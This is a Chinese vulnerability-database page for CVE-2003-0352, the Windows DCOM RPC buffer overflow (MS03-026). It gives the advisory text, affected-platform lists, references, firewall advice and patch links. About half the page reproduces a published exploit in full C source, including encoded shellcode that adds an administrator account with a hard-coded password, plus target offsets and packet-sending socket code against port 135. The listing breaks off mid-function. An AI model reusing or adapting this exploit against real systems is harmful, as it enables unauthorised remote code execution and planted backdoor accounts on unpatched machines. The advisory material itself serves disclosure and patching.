CVE-2003-0352
CVSS7.5
发布时间 :2003-08-18 00:00:00
修订时间 :2016-10-17 22:32:57
NMCOEPS    

[原文]Buffer overflow in a certain DCOM interface for RPC in Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary code via a malformed message, as exploited by the Blaster/MSblast/LovSAN and Nachi/Welchia worms.


[CNNVD]Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞(MS03-026)(CNNVD-200308-059)

        
        Remote Procedure Call (RPC)是Windows操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行的程序无缝地在远程系统上执行代码。协议本身源自OSF RPC协议,但增加了Microsoft特定的扩展。
        Microsoft的RPC部分在通过TCP/IP处理信息交换时存在问题,远程攻击者可以利用这个漏洞以本地系统权限在系统上执行任意指令。
        此漏洞是由于不正确处理畸形消息所致,漏洞影响使用RPC的DCOM接口。此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。攻击者成功利用此漏洞可以以本地系统权限执行任意指令。攻击者可以在系统上执行任意操作,如安装程序、查看或更改、删除数据或建立系统管理员权限的帐户。
        要利用这个漏洞,攻击者需要发送特殊形式的请求到远程机器上的135端口。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_nt:4.0:sp6a:serverMicrosoft Windows 4.0 sp6a server
cpe:/o:microsoft:windows_2003_server:r2::datacenter_64-bit
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_nt:4.0:sp6a:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6a
cpe:/o:microsoft:windows_2000::sp4:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP4
cpe:/o:microsoft:windows_xp::sp1:64-bit
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp5:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP5
cpe:/o:microsoft:windows_nt:4.0:sp2:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP2
cpe:/o:microsoft:windows_nt:4.0:sp6:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP6
cpe:/o:microsoft:windows_nt:4.0:sp6a:enterprise_server
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_nt:4.0:sp5:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp6a:workstationMicrosoft Windows 4.0 sp6a workstation
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_2000::sp4:professionalMicrosoft Windows 2000 Professional SP4
cpe:/o:microsoft:windows_nt:4.0:sp5:serverMicrosoft Windows 4.0 sp5 server
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_nt:4.0:sp6:serverMicrosoft Windows 4.0 sp6 server
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_nt:4.0:sp3:serverMicrosoft Windows 4.0 sp3 server
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_nt:4.0:sp4:serverMicrosoft Windows 4.0 sp4 server
cpe:/o:microsoft:windows_nt:4.0:sp1:serverMicrosoft Windows 4.0 sp1 server
cpe:/o:microsoft:windows_nt:4.0::terminal_server
cpe:/o:microsoft:windows_nt:4.0:sp2:serverMicrosoft Windows 4.0 sp2 server
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp4:serverMicrosoft Windows 2000 Server SP4
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_nt:4.0:sp5:workstationMicrosoft Windows 4.0 sp5 workstation
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_nt:4.0:sp6:workstationMicrosoft Windows 4.0 sp6 workstation
cpe:/o:microsoft:windows_nt:4.0:sp3:workstationMicrosoft Windows 4.0 sp3 workstation
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_nt:4.0:sp4:workstationMicrosoft Windows 4.0 sp4 workstation
cpe:/o:microsoft:windows_nt:4.0:sp1:workstationMicrosoft Windows 4.0 sp1 workstation
cpe:/o:microsoft:windows_nt:4.0:sp2:workstationMicrosoft Windows 4.0 sp2 workstation
cpe:/o:microsoft:windows_nt:4.0::workstation
cpe:/o:microsoft:windows_2003_server:enterprise_64-bit
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_nt:4.0::enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp3:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp4:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp1:enterprise_server
cpe:/o:microsoft:windows_nt:4.0:sp2:enterprise_server
cpe:/o:microsoft:windows_nt:4.0::server
cpe:/o:microsoft:windows_nt:4.0:sp4:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP4
cpe:/o:microsoft:windows_nt:4.0:sp1:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP1
cpe:/o:microsoft:windows_nt:4.0:sp3:terminal_serverMicrosoft Windows NT Terminal Server 4.0 SP3
cpe:/o:microsoft:windows_xp::gold:professionalMicrosoft Windows XP Professional Gold
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_2000::sp4:advanced_serverMicrosoft Windows 2000 Advanced Server SP4
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_xp:::home

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:296Windows 2000 RPCSS DCOM Buffer Overflow (Blaster, Test 2)
oval:org.mitre.oval:def:2343Windows XP RPCSS DCOM Buffer Overflow (Blaster, Test 2)
oval:org.mitre.oval:def:194Windows NT RPCSS DCOM Buffer Overflow (Blaster, Test 2)
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0352
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0352
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-059
(官方数据源) CNNVD

- 其它链接及资源

http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/007079.html
(UNKNOWN)  FULLDISC  20030726 Re: The French BUGTRAQ (New Win RPC Exploit)
http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/007357.html
(UNKNOWN)  FULLDISC  20030730 rpcdcom Universal offsets
http://marc.info/?l=bugtraq&m=105838687731618&w=2
(UNKNOWN)  BUGTRAQ  20030716 [LSD] Critical security vulnerability in Microsoft Operating Systems
http://marc.info/?l=bugtraq&m=105914789527294&w=2
(UNKNOWN)  BUGTRAQ  20030725 The Analysis of LSD's Buffer Overrun in Windows RPC Interface(code revised )
http://www.cert.org/advisories/CA-2003-16.html
(UNKNOWN)  CERT  CA-2003-16
http://www.cert.org/advisories/CA-2003-19.html
(UNKNOWN)  CERT  CA-2003-19
http://www.kb.cert.org/vuls/id/568148
(UNKNOWN)  CERT-VN  VU#568148
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
(UNKNOWN)  MS  MS03-026
http://www.securityfocus.com/bid/8205
(VENDOR_ADVISORY)  BID  8205
http://www.xfocus.org/documents/200307/2.html
(UNKNOWN)  MISC  http://www.xfocus.org/documents/200307/2.html
http://xforce.iss.net/xforce/xfdb/12629
(VENDOR_ADVISORY)  XF  win-rpc-dcom-bo(12629)

- 漏洞信息

Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞(MS03-026)
高危 边界条件错误
2003-08-18 00:00:00 2005-10-20 00:00:00
远程  
        
        Remote Procedure Call (RPC)是Windows操作系统使用的一种远程过程调用协议,RPC提供进程间交互通信机制,允许在某台计算机上运行的程序无缝地在远程系统上执行代码。协议本身源自OSF RPC协议,但增加了Microsoft特定的扩展。
        Microsoft的RPC部分在通过TCP/IP处理信息交换时存在问题,远程攻击者可以利用这个漏洞以本地系统权限在系统上执行任意指令。
        此漏洞是由于不正确处理畸形消息所致,漏洞影响使用RPC的DCOM接口。此接口处理由客户端机器发送给服务器的DCOM对象激活请求(如UNC路径)。攻击者成功利用此漏洞可以以本地系统权限执行任意指令。攻击者可以在系统上执行任意操作,如安装程序、查看或更改、删除数据或建立系统管理员权限的帐户。
        要利用这个漏洞,攻击者需要发送特殊形式的请求到远程机器上的135端口。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用防火墙过滤系统的服务端口,使不可信主机无法访问。该漏洞影响的操作系统范围包括Windows NT/2000/XP/2003,使用Windows 95/98/ME的用户不受该问题的影响。由于漏洞是利用Windows的DCOM RPC接口的弱点侵害系统,而在Windows系统中可以进行RPC调用的端口至少包括:
        135/TCP epmap DCE endpoint resolution
        135/UDP epmap DCE endpoint resolution
        139/TCP netbios-ssn NETBIOS Session Service
        139/UDP netbios-ssn NETBIOS Session Service
        445/TCP microsoft-ds Win2k+ Server Message Block
        445/UDP microsoft-ds Win2k+ Server Message Block
        593/TCP http-rpc-epmap HTTP RPC Ep Map
        593/UDP http-rpc-epmap HTTP RPC Ep Map
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-026)以及相应补丁:
        MS03-026:Buffer Overrun In RPC Interface Could Allow Code Execution(Q823980)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

        补丁下载:
        Windows NT 4.0 Server:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F&displaylang=en

        Windows NT 4.0 Terminal Server Edition :
        
        http://microsoft.com/downloads/details.aspx?FamilyId=6C0F0160-64FA-424C-A3C1-C9FAD2DC65CA&displaylang=en

        Windows 2000:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=C8B8A846-F541-4C15-8C9F-220354449117&displaylang=en

        Windows XP 32 bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en

        Windows XP 64 bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=1B00F5DF-4A85-488F-80E3-C347ADCC4DF1&displaylang=en

        Windows Server 2003 32 bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=F8E0FF3A-9F4C-4061-9009-3A212458E92E&displaylang=en

        Windows Server 2003 64 bit Edition:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=2B566973-C3F0-4EC1-995F-017E35692BC7&displaylang=en

- 漏洞信息 (100)

MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) (EDBID:100)
windows remote
2003-09-16 Verified
135 ey4s
N/A [点击下载]
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

#pragma comment(lib,"ws2_32")

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

//user="e" pass="asd#321"
unsigned char sc_add_user[]=
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
"\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
"\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
"\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
"\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
"\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
"\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
"\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
"\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
"\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
"\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
"\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
"\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
#define	sc_offset		0x24
#define	sc_max			0x208
#define	jmp_addr_offset	sc_max+sc_offset+0x8
#define	top_seh_offset	jmp_addr_offset+0x4

unsigned char sc[]=
"\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"
"\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"
"\x43\x00\x24\x00\x5c\x00"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"\xe9\xf3\xfd\xff\xff"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

struct
{
	char	*os;
	DWORD	dwTopSeh;
	char	*seh;
	DWORD	dwJmpAddr;
	char	*jmp;
}
targets[] =
{
	{ "2kEnSp4+MS03-026", 
		0x7c54144c,
		"kernel32.dll v5.0.2195.6688",
		0x77a1b496,
		"OLEAUT32.dll v2.40.4522.0"},
	{ "2kEnSp3+SomeHotFixs+MS03-026", 
		0x77eda1f0,
		"kernel32.dll v5.0.2195.6079",
		0x77a1afa9,
		"OLEAUT32.dll v2.40.4518.0"}
}, v;
void main(int argc,char ** argv)
{
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
	int	i, iType;

	printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
			"Base on flashsky's MS03-026 exp\n"
			"Code by ey4s<eyas#xfocus.org>\n"
			"2003-09-16\n"
			"Welcome to http://www.xfocus.net\n"
			"Thanks to flashsky & benjurry & Dave Aitel\n"
			"If success, target will add a user \"e\" and password is \"asd#321\"\n\n");

	if(argc!=3)
	{
		printf("Usage: %s <target> <type>\n", argv[0]);
		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
			printf( "<%d>   %s\n"
					"      TopSeh=0x%.8x in %s\n"
					"      JmpAddr=0x%.8x in %s\n",
					i, targets[i].os,
					targets[i].dwTopSeh, targets[i].seh,
					targets[i].dwJmpAddr, targets[i].jmp);
		return;
	}

	iType = atoi(argv[2]);
	if((iType<0) || iType > sizeof(targets)/sizeof(v))
	{
		printf("[-] Wrong type.\n");
		return;
	}

	memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
	memcpy(&sc[jmp_addr_offset], &targets[iType].dwJmpAddr,4);
	memcpy(&sc[top_seh_offset], &targets[iType].dwTopSeh,4);
	printf("[+] Prepare shellcode completed.\n");

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
    
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
	printf("[+] Connect to %s:135 success.\n", argv[1]);

	if(sizeof(sc_add_user) > sc_max)
	{
		printf("[-] shellcode too long, exit.\n");
		return;
	}

 
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  //¼ÆËãÎļþÃûË«×Ö½Ú³¤¶È
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;//¼ÆËãÎļþÃûË«×Ö½Ú³¤¶È
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
    //¼ÆËã¸÷ÖֽṹµÄ³¤¶È
    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;

    len = send(sock,bindstr,sizeof(bindstr),0);
	if(len<=0)
    {
            printf("[-] Send failed.Error:%d\n",WSAGetLastError());
            return;
    }
 	else
		printf("[+] send %d bytes.\n", len);
	
